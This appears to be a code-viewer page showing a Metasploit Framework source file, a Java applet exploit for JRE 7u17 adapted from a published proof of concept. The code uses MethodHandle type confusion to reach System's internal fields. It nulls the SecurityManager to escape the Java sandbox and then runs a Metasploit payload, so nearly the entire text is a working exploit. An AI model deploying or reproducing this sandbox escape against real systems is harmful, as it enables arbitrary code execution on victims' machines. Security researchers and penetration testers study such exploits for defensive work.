rapid7/metasploit-framework

View on GitHub
external/source/exploits/jre17u17/Exploit.java

Summary

Maintainability
A
0 mins
Test Coverage
//Original PoC from Jeroen Frijters @Jeroen Frijters

import java.lang.invoke.MethodHandle;
import java.lang.reflect.Field;
import static java.lang.invoke.MethodHandles.lookup;
import java.applet.Applet;
import metasploit.Payload;

class Union1 {
    int field1;
    Object field2;
}

class Union2 {
    int field1;
    SystemClass field2;
}

class SystemClass {
    Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,
        f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23,
        f24,f25,f26,f27,f28,f29,f30;
}

public class Exploit extends Applet
{

    public Exploit()
    {
    }
        
    static void disableSecurityManager() throws Throwable {
        MethodHandle mh1, mh2;
        mh1 = lookup().findStaticSetter(Double.class, "TYPE", Class.class);
        mh2 = lookup().findStaticSetter(Integer.class, "TYPE", Class.class);
        Field fld1 = Union1.class.getDeclaredField("field1");
        Field fld2 = Union2.class.getDeclaredField("field1");
        Class classInt = int.class;
        Class classDouble = double.class;
        mh1.invokeExact(int.class);
        mh2.invokeExact((Class)null);
        Union1 u1 = new Union1();
        u1.field2 = System.class;
        Union2 u2 = new Union2();
        fld2.set(u2, fld1.get(u1));
        mh1.invokeExact(classDouble);
        mh2.invokeExact(classInt);
        if (u2.field2.f29 == System.getSecurityManager()) {
            u2.field2.f29 = null;
        } else if (u2.field2.f30 == System.getSecurityManager()) {
            u2.field2.f30 = null;
        } else {
            //System.out.println("security manager field not found");
        }
    }    

    public void init()
    {
        try
        {
            //System.out.println(System.getSecurityManager());
            disableSecurityManager();
            //System.out.println(System.getSecurityManager());
            //Runtime.getRuntime().exec("calc.exe");            
            Payload.main(null);
        }
        catch(Exception exception)
        {
            //exception.printStackTrace();
        } catch(Throwable t) {
            //t.printStackTrace();
        }
    }

}